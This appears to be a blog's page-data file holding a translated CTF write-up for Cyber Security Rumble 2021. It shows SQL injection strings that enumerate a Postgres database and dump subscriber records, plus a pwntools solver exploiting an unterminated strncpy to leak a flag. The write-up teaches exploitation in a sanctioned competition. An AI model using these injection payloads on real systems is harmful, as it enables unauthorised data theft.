{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-rumblectf-2021-en","result":{"data":{"markdownRemark":{"id":"856e43fe-7b67-5de0-a286-f206387f515e","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-rumblectf-2021\">original page</a>.</p>\n</blockquote>\n<p>I participated in Cyber Security Rumble 2021 CTF, which began on 2021/11/26.</p>\n<p>I will write up a few challenges.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#stonks-street-journal-web\">Stonks Street Journal (Web)</a></p>\n<ul>\n<li><a href=\"#using-sql-injection-to-retrieve-other-users-information\">Using SQL injection to retrieve other users’ information</a></li>\n<li><a href=\"#using-sql-injection-to-explore-other-tables\">Using SQL injection to explore other tables</a></li>\n<li><a href=\"#using-sql-injection-to-explore-column-information\">Using SQL injection to explore column information</a></li>\n</ul>\n</li>\n<li><a href=\"#flag-checker-baby-pwn\">Flag Checker, Baby (Pwn)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"stonks-street-journal-web\" style=\"position:relative;\"><a href=\"#stonks-street-journal-web\" aria-label=\"stonks street journal web permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" 
height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stonks Street Journal (Web)</h2>\n<p>Accessing the website brings you to a members-only news site.</p>\n<p>When you register, the user registration itself does not complete, but you are redirected to an Invoice page where you can review the submitted information.</p>\n<p>This page is accessed via a URL like the following, and it is managed by a path that Base64-encodes the registered user and date, such as <code class=\"language-text\">username-2021-11-27</code>.</p>\n<p><code class=\"language-text\">http://ssj.rumble.host/legacy_invoice_system/dGVzdHVzZXItMjAyMS0xMS0yNw==</code></p>\n<p>Here, I tried changing either the username part or the date part into an arbitrary string that did not fit the format. 
That caused an SQL error, which showed that an SQL injection vulnerability existed.</p>\n<h3 id=\"using-sql-injection-to-retrieve-other-users-information\" style=\"position:relative;\"><a href=\"#using-sql-injection-to-retrieve-other-users-information\" aria-label=\"using sql injection to retrieve other users information permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using SQL injection to retrieve other users’ information</h3>\n<p>I started by exploring information about other users in the table.</p>\n<p>It looked like UNION-based injection would work for reconnaissance.</p>\n<p>As for the name of the table that manages users, I was able to identify it as <code class=\"language-text\">news_subscriber</code> by using commands such as WHERE and HAVING to trigger error messages.</p>\n<div class=\"gatsby-highlight\" data-language=\"sql\"><pre class=\"language-sql\"><code class=\"language-sql\">Rakete<span class=\"token operator\">-</span><span class=\"token number\">2021</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token operator\">-</span><span class=\"token number\">26</span>' <span class=\"token keyword\">UNION</span> <span class=\"token keyword\">SELECT</span> id<span class=\"token punctuation\">,</span>username<span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span>pensi<span class=\"token punctuation\">,</span>email<span class=\"token 
punctuation\">,</span>credit_card<span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span> <span class=\"token keyword\">FROM</span> news_subscriber <span class=\"token keyword\">WHERE</span> id<span class=\"token operator\">=</span><span class=\"token number\">10</span><span class=\"token comment\">--</span></code></pre></div>\n<p>Therefore, with a command like the one above, you can inspect user pages one by one by specifying an ID or username.</p>\n<p>Unfortunately, even after exploring the entire <code class=\"language-text\">news_subscriber</code> table, there were no users that seemed likely to lead to the flag.</p>\n<h3 id=\"using-sql-injection-to-explore-other-tables\" style=\"position:relative;\"><a href=\"#using-sql-injection-to-explore-other-tables\" aria-label=\"using sql injection to explore other tables permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using SQL injection to explore other tables</h3>\n<p>Next, I decided to look for tables other than <code class=\"language-text\">news_subscriber</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"sql\"><pre class=\"language-sql\"><code class=\"language-sql\">Rakete<span class=\"token operator\">-</span><span class=\"token number\">2021</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token operator\">-</span><span class=\"token number\">26</span>' <span class=\"token keyword\">UNION</span> <span class=\"token keyword\">SELECT</span> id<span 
class=\"token punctuation\">,</span>version<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span> <span class=\"token keyword\">FROM</span> news_subscriber</code></pre></div>\n<p>As shown above, using the <code class=\"language-text\">version()</code> command let me identify the database as Postgres.</p>\n<p>Since the database is Postgres, table information can be referenced from the <code class=\"language-text\">tablename</code> column in <code class=\"language-text\">pg_tables</code>.</p>\n<p>There are several ways to retrieve it, but if you want to enumerate them in order from the beginning, the <code class=\"language-text\">LIMIT 1 OFFSET n</code> syntax is convenient.</p>\n<p><code class=\"language-text\">LIKE</code> is also useful when you want to search for tables containing a specific string.</p>\n<div class=\"gatsby-highlight\" data-language=\"sql\"><pre class=\"language-sql\"><code class=\"language-sql\"><span class=\"token comment\"># Retrieve the 6th table via SQL injection</span>\nRakete<span class=\"token operator\">-</span><span class=\"token number\">2021</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token operator\">-</span><span class=\"token number\">26</span><span class=\"token string\">';SELECT null,tablename,null,null,null,null,null FROM pg_tables LIMIT 1 OFFSET 6;--\n\n# Retrieve tables whose table name contains the string name via SQL injection\nRakete-2021-11-26'</span><span class=\"token punctuation\">;</span><span class=\"token keyword\">SELECT</span> <span class=\"token boolean\">null</span><span 
class=\"token punctuation\">,</span>tablename<span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span> <span class=\"token keyword\">FROM</span> pg_tables <span class=\"token keyword\">WHERE</span> tablename <span class=\"token operator\">LIKE</span> <span class=\"token string\">'%name%'</span><span class=\"token punctuation\">;</span><span class=\"token comment\">--</span></code></pre></div>\n<p>Exploring tables in this way revealed one called <code class=\"language-text\">news_article</code>.</p>\n<h3 id=\"using-sql-injection-to-explore-column-information\" style=\"position:relative;\"><a href=\"#using-sql-injection-to-explore-column-information\" aria-label=\"using sql injection to explore column information permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using SQL injection to explore column information</h3>\n<p>It looked like the flag was probably stored in the <code class=\"language-text\">news_article</code> table.</p>\n<p>So I moved on to exploring the columns of the <code class=\"language-text\">news_article</code> table.</p>\n<p>In Postgres, information about the columns of a specific table can be filtered in the form <code 
class=\"language-text\">information_schema.columns WHERE table_name='news_article'</code>.</p>\n<p>After that, just as when retrieving table information earlier, you can use LIMIT and LIKE to enumerate the column information, then use UNION injection to retrieve the column data and obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"sql\"><pre class=\"language-sql\"><code class=\"language-sql\">Rakete<span class=\"token operator\">-</span><span class=\"token number\">2021</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token operator\">-</span><span class=\"token number\">26</span><span class=\"token string\">';SELECT null,column_name,null,null,null,null,null FROM information_schema.columns WHERE table_name='</span>news_article<span class=\"token string\">' AND column_name LIMIT 1 OFFSET 3;--\n\nRakete-2021-11-26'</span><span class=\"token punctuation\">;</span><span class=\"token keyword\">SELECT</span> <span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span>column_name<span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span> <span class=\"token keyword\">FROM</span> information_schema<span class=\"token punctuation\">.</span><span class=\"token keyword\">columns</span> <span class=\"token keyword\">WHERE</span> table_name<span class=\"token operator\">=</span><span class=\"token string\">'news_article'</span> <span class=\"token operator\">AND</span> column_name <span class=\"token operator\">LIKE</span> <span class=\"token string\">'%te%'</span><span class=\"token comment\">--</span></code></pre></div>\n<p>Using this 
method, I was able to recover the flag information from the title on the Invoice page, as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 500px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2c0394ba764763e3944aee1550b2d2b5/0b533/image-14.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 61.66666666666666%; position: relative; bottom: 0; left: 0; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2c0394ba764763e3944aee1550b2d2b5/8ac56/image-14.webp 240w,\n/static/2c0394ba764763e3944aee1550b2d2b5/d3be9/image-14.webp 480w,\n/static/2c0394ba764763e3944aee1550b2d2b5/b0a15/image-14.webp 500w\"\n              sizes=\"(max-width: 500px) 100vw, 500px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2c0394ba764763e3944aee1550b2d2b5/8ff5a/image-14.png 240w,\n/static/2c0394ba764763e3944aee1550b2d2b5/e85cb/image-14.png 480w,\n/static/2c0394ba764763e3944aee1550b2d2b5/0b533/image-14.png 500w\"\n            sizes=\"(max-width: 500px) 100vw, 500px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2c0394ba764763e3944aee1550b2d2b5/0b533/image-14.png\"\n            alt=\"image-14.png\"\n            title=\"image-14.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a 
href=\"https://ctf.zeyu2001.com/2021/cybersecurityrumble-ctf/stonks-street-journal\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Stonks Street Journal - CTFs</a></p>\n<h2 id=\"flag-checker-baby-pwn\" style=\"position:relative;\"><a href=\"#flag-checker-baby-pwn\" aria-label=\"flag checker baby pwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Flag Checker, Baby (Pwn)</h2>\n<p>You are given a binary and its source code.</p>\n<p>Reading the source code shows the following behavior.</p>\n<ol>\n<li>The input string and FLAG are passed to the <code class=\"language-text\">check</code> function.</li>\n<li>If the input string is larger than 32 bytes (the size of <code class=\"language-text\">guess</code>), the function is not called.</li>\n<li>The input string is stored in the <code class=\"language-text\">guess</code> variable.</li>\n<li>FLAG is stored in the <code class=\"language-text\">flag</code> variable.</li>\n<li>The <code class=\"language-text\">flag</code> and <code class=\"language-text\">guess</code> variables are compared with <code class=\"language-text\">strcmp</code>; if they match, the flag is displayed, and if they do not match, the value of <code class=\"language-text\">guess</code> is displayed.</li>\n<li>Considering the memory layout of the local variables, <code class=\"language-text\">flag</code> is placed contiguously after <code class=\"language-text\">guess</code>.</li>\n<li>Since <code class=\"language-text\">guess</code> can accept only up to 32 bytes, by 
entering 32 bytes that contain no null character, the concatenated contents of <code class=\"language-text\">guess</code> and <code class=\"language-text\">flag</code> are printed by the line <code class=\"language-text\">printf(\"Wrong flag: %s\\n\", guess);</code>.</li>\n</ol>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;string.h></span></span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">check</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>input<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>secret_flag<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\t\n\t<span class=\"token keyword\">char</span> guess<span class=\"token punctuation\">[</span><span class=\"token number\">32</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> flag<span class=\"token punctuation\">[</span><span class=\"token number\">64</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token 
function\">strlen</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>guess<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n\t\t<span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"HACKER!\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t\t<span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token punctuation\">}</span>\n\n\t<span class=\"token function\">strncpy</span><span class=\"token punctuation\">(</span>guess<span class=\"token punctuation\">,</span> input<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>guess<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">strncpy</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">,</span> secret_flag<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token function\">strcmp</span><span class=\"token punctuation\">(</span>guess<span class=\"token punctuation\">,</span> flag<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n\t\t<span class=\"token function\">printf</span><span 
class=\"token punctuation\">(</span><span class=\"token string\">\"Well done! You got it: %s\\n\"</span><span class=\"token punctuation\">,</span> flag<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token punctuation\">}</span>\n\t<span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n\t\t<span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Wrong flag: %s\\n\"</span><span class=\"token punctuation\">,</span> guess<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> argv<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n\t<span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span 
class=\"token punctuation\">;</span>\n\n\t<span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>secret_flag <span class=\"token operator\">=</span> <span class=\"token function\">getenv</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span>secret_flag<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n\t\t<span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Flag not found, contact challenge authors.\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t\t<span class=\"token keyword\">return</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token punctuation\">}</span>\n\n\t<span class=\"token keyword\">char</span> input<span class=\"token punctuation\">[</span><span class=\"token number\">128</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Enter the flag: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">check</span><span class=\"token 
punctuation\">(</span>input<span class=\"token punctuation\">,</span> secret_flag<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n\t<span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>This solver can recover the FLAG.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n<span class=\"token keyword\">import</span> binascii\n<span class=\"token keyword\">import</span> time\n\nelf <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">\"./chall\"</span><span class=\"token punctuation\">)</span>\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> elf\n\n<span class=\"token comment\"># 31 bytes plus the newline appended by sendline() make 32 bytes, so strncpy leaves guess without a NUL terminator</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"\\x41\"</span><span class=\"token operator\">*</span><span class=\"token number\">31</span>\n\n<span class=\"token comment\"># Local</span>\np <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./chall\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># p = remote(\"challs.rumble.host\", 53921)</span>\n\nr <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span></code></pre></div>\n<p>Reference: <a href=\"https://github.com/aly-ab/CTF-writeups/blob/main/notes/cybersecurityrumble/Pwn%20-%20Flag%20Checker%2C%20Baby.md\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">CTF-writeups/Pwn - Flag Checker, Baby.md at main · aly-ab/CTF-writeups</a></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>There was a Linux Game challenge in Rev that I really wanted to solve somehow, but in the end I could not.</p>\n<p>I still have no idea because I cannot find a writeup, but if I do find one, I think I will update this article.</p>","fields":{"slug":"/ctf-rumblectf-2021-en","tagSlugs":["/tag/ctf-en/","/tag/web-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2021-11-30","description":"A writeup from Cyber Security Rumble CTF 2021, held from November 26, 2021.","tags":["CTF (en)","Web (en)","Pwn (en)","English"],"title":"Cyber Security Rumble CTF 2021 Writeup","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/ctf-rumblectf-2021-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}